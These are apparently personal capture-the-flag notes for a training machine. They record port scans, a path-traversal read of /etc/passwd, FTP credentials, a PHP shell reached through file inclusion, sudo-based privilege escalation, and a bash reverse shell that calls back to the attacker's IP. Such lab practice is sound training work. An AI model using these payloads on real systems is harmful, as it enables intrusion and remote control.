# SCOPE
CTF-LINK: https://tryhackme.com/room/watcher
IP: 10.10.230.235
DOMAIN:
ME: 10.9.15.141


# RECON
    ## port scan
    nmap $ip -vvv
    nmap $ip -oN nmap_scan -vvvv -sC -sV -p 21,22,80

    nikto -host 10.10.230.235



    ## scans results
    21/tcp open  ftp     syn-ack vsftpd 3.0.3
    22/tcp open  ssh     syn-ack OpenSSH 7.6p1
    80/tcp open  http    syn-ack Apache httpd 2.4.29 
	    Jekyll v4.1.1


## webserver
robots.txt:
	Allow: /flag_1.txt -> FLAG
	Allow: /secret_file_do_not_read.txt -> 403

http://10.10.230.235/secret_file_do_not_read.txt

	
LFI:
http://10.10.230.235/post.php?post=../../../../../etc/passwd

unix user enum ->
will
mat
toby


FTP creds:
	ftpuser:givemefiles777 

→SHELL http://10.10.230.235/post.php?post=/home/ftpuser/ftp/files/hi.php


# CREDS
FTP:
	ftpuser:givemefiles777 

# exploitation


## local
www-data sudo -l
(toby) NOPASSWD: ALL

sudo -u toby bash


bash -i >& /dev/tcp/10.9.15.141/9001 0>&1

mat

(will) NOPASSWD: /usr/bin/python3 /home/mat/scripts/will_script.py *




## linpeas
Vulnerable to CVE-2021-4034
Potentially Vulnerable to CVE-2022-25



(will) NOPASSWD: /usr/bin/python3 /home/mat/scripts/will_script.py *



sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py *


ssh root@10.10.230.235 -i ssh



